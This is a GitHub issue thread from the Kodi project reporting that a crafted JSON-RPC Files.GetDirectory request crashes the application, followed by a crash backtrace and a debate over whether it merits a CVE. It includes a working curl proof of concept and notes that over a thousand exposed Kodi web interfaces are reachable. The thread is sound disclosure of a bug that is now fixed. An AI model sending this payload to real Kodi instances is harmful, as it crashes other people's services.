### ISSUE TITLE
[JSON RPC] Denial of Service in Files.GetDirectory method

### ISSUE THREAD

**Issue by nikolakojic2** [xbmc/xbmc#17432]
### Describe the bug
A remote attacker can cause crash of Kodi application by sending a crafted JSON RPC request that contains `/./` value in the `directory` parameter.

### To Reproduce

1. Navigate to Settings > Services > Control
2. Enable "allow remote control via HTTP"
3. Send the following curl command:
```
curl -X POST -H "content-type:application/json" http://localhost:8080/jsonrpc -d '{"jsonrpc":"2.0","method":"Files.GetDirectory","id":"1583238585622","params":{"directory":"plugin://foobar/./","media":"video","properties":["title","file","mimetype","thumbnail","dateadded"],"sort":{"method":"none","order":"ascending"}}}'
```
4. The Kodi application will crash.

### Debuglog

```
POST /jsonrpc HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/
Content-Type: application/json
Content-Length: 238
Connection: close

{"jsonrpc":"2.0","method":"Files.GetDirectory","id":"1583238585622","params":{"directory":"plugin://foobar/./","media":"video","properties":["title","file","mimetype","thumbnail","dateadded"],"sort":{"method":"none","order":"ascending"}}}
```

### Screenshots 
Here are some links or screenshots to help explain the problem:

## Additional context or screenshots (if appropriate)
Here is some additional context or explanation that might help:

### Your Environment
Used Operating system:

 - [X] Android
 - [ ] iOS
 - [X] Linux
 - [ ] OSX
 - [X] Raspberry-Pi
 - [X] Windows
 - [ ] Windows UWP

 - Kodi version: Kodi v18.6 "Leia"

*note: Once the issue is made we require you to update it with new information or Kodi versions should that be required.
Team Kodi will consider your problem report however, we will not make any promises the problem will be solved.*

**Comment by MilhouseVH** [comment]
Confirmed with latest Kodi master 844c0d17b1fc9a828fee70b74f56601f7ed8652b.

This is a crash log from Ubuntu 19.10: http://ix.io/2diA
```
Thread 1 (Thread 0x7f2f447ad700 (LWP 4364)):
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007f3009d15899 in __GI_abort () at abort.c:79
#2  0x00007f300984e5f6 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#3  0x00007f300985a9ec in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#4  0x00007f300985aa47 in std::terminate() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#5  0x00007f300985aca9 in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#6  0x00007f3009850f31 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#7  0x000055c2c37735c8 in URIUtils::resolvePath(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) ()
#8  0x000055c2c3778bfb in URIUtils::GetRealPath(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) ()
#9  0x000055c2c36ce199 in CFileUtils::RemoteAccessAllowed(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) ()
#10 0x000055c2c412adc5 in JSONRPC::CFileOperations::GetDirectory(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, JSONRPC::ITransportLayer*, JSONRPC::IClient*, CVariant const&, CVariant&) ()
#11 0x000055c2c4134725 in JSONRPC::CJSONRPC::HandleMethodCall(CVariant const&, CVariant&, JSONRPC::ITransportLayer*, JSONRPC::IClient*) ()
#12 0x000055c2c4135b3d in JSONRPC::CJSONRPC::MethodCall(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, JSONRPC::ITransportLayer*, JSONRPC::IClient*) ()
#13 0x000055c2c311a5ca in CHTTPJsonRpcHandler::HandleRequest() ()
#14 0x000055c2c3fe9463 in CWebServer::HandleRequest(std::shared_ptr<IHTTPRequestHandler> const&) ()
#15 0x000055c2c3feb35c in CWebServer::HandlePartialRequest(MHD_Connection*, CWebServer::ConnectionHandler*, HTTPRequest const&, char const*, unsigned long*, void**) ()
#16 0x000055c2c3fe72da in CWebServer::AnswerToConnection(void*, MHD_Connection*, char const*, char const*, char const*, char const*, unsigned long*, void**) ()
#17 0x00007f300c24e7e1 in ?? () from /usr/lib/x86_64-linux-gnu/libmicrohttpd.so.12
#18 0x00007f300c250838 in ?? () from /usr/lib/x86_64-linux-gnu/libmicrohttpd.so.12
#19 0x00007f300c2528de in ?? () from /usr/lib/x86_64-linux-gnu/libmicrohttpd.so.12
#20 0x00007f300c256069 in ?? () from /usr/lib/x86_64-linux-gnu/libmicrohttpd.so.12
#21 0x00007f300c4d9669 in start_thread (arg=<optimised out>) at pthread_create.c:479
#22 0x00007f3009e12323 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
```
In the console, kodi exits with:
```
neil@nm-linux:~$ ./runkodi.sh
EXEC: DISPLAY=:0 /home/neil/projects/kodi.git/kodi-build/kodi-x11
libva info: VA-API version 1.5.0
libva info: va_getDriverName() returns 0
libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/radeonsi_drv_video.so
libva info: Found init function __vaDriverInit_1_5
mesa: for the   --simplifycfg-sink-common option: may only occur zero or one times!
mesa: for the   --global-isel-abort option: may only occur zero or one times!
libva info: va_openDriver() returns 0
terminate called after throwing an instance of 'std::out_of_range'
  what():  basic_string::at: __n (which is 18446744073709551615) >= this->size() (which is 0)
Aborted (core dumped)
```

**Comment by nikolakojic2** [comment]
Hi @DaVukovic @enen92 ,
Can someone please request a CVE for this?

Best regards,
Nikola Kojic

**Comment by yol** [comment]
@nikolakojic2 how is this a denial of service _vulnerability_? If you have access to JSONRPC, you can just as well stop Kodi using normal and documented API methods.

**Comment by nikolakojic2** [comment]
@yol 
It's a denial of service vulnerability because the crash can be triggered by a remote user, and because of the following facts:

1. When a user enables a remote control via HTTP, it opens a fully unauthenticated Kodi web interface (sure that users can set a username and a password, but the Kodi application does not force them to do so). As a result of default settings, simple search on shodan.io shows that there are possibly around 1300+ open Kodi web interfaces publicly accessible, as you can see from the image below. 
![kodi](https://user-images.githubusercontent.com/61745720/76833594-e7cbd880-682b-11ea-8d78-16e75ed72e6a.png)
2. Crashing the Kodi by sending a crafted HTTP JSON request is not normal, nor is it API documented behavior, and it can cause confusion among users. 
3. This weakness is already described in __CWE-248: Uncaught Exception__ as you can see from https://cwe.mitre.org/data/definitions/248.html 

Best regards,
Nikola Kojic

**Comment by DaVukovic** [comment]
Well, from my POV (and I'm not a security expert) a DoS attack is mostly done by flooding a service to the point where it stops responding/acting. 
Quote:
> Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled

The issue mentioned here is sending a JSON request which makes Kodi crash. If you tear it down, it's somewhat comparable, but it's also not 100% the same. 

The fact that users do make their Kodi installation reachable from the web is not our fault, as:
- the webserver is disabled by default and a user has to manually enable it
- the user either has to put Kodi into a DMZ or has actively opened ports to make it reachable

I, personally, will not request a CVE for that because
- a fix already has been merged
- that fix will also be backported to Kodi 18.7 (see the flag for that PR)
- Kodi version <18 aren't supported anymore anyway

If we would request a CVE for that, every *ELEC distribution need to request a CVE because it's possible to put it into a DMZ, or open ports to make it reachable and that the root password for the only existing user is written nearly in every Kodi-related forum or wiki. (Beside the fact that users are able to change the root password).

I appreciate your report, but creating a CVE sounds a bit like overkill.

**Comment by yol** [comment]
> Well, from my POV (and I'm not a security expert) a DoS attack is mostly done by flooding a service to the point where it stops responding/acting.

@DaVukovic Not necessarily (note the word "typically"). Crashing the service is also "denial of service". So this behavior definitely qualifies as DoS.

> When a user enables a remote control via HTTP, it opens a fully unauthenticated Kodi web interface (sure that users can set a username and a password, but the Kodi application does not force them to do so)

That is correct but not really related, as @DaVukovic already pointed out.

> Crashing the Kodi by sending a crafted HTTP JSON request is not normal, nor is it API documented behavior, and it can cause confusion among users.

I agree fully. But neither abnormal nor undocumented nor confusing behavior qualifies, by itself, something to be a security issue.

> This weakness is already described in CWE-248: Uncaught Exception

Again, there is no _weakness_ in this case since the same effect (Kodi not operating) can be reached via the same interface with the same authentication by normal means (i.e., without an uncaught exception). You have not demonstrated that the uncaught exception can be used for information disclosure or any other problematic behavior beyond what is possible without provoking an exception anyway. Sure you could request a CVE for this, but to me, this seems very much like an academic exercise. I can see zero real-world impact of this crash. You are welcome to demonstrate otherwise.

**To be clear: I would like to thank you for reporting this bug.** It is a valid issue since it can crash the application without user intention and it is very good that we have it fixed now. I hope you continue to report any issue like this that you encounter. I just really do not see why it is worth a CVE.
